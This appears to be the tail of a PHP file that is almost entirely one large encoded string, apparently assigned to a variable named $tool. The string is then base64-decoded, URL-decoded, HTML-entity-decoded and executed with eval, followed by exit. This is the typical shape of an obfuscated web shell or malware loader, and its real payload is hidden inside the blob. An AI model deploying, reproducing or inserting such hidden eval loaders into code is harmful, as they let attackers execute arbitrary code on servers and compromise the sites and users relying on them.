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";
eval(htmlspecialchars_decode(urldecode(base64_decode($tool))));
exit;
?>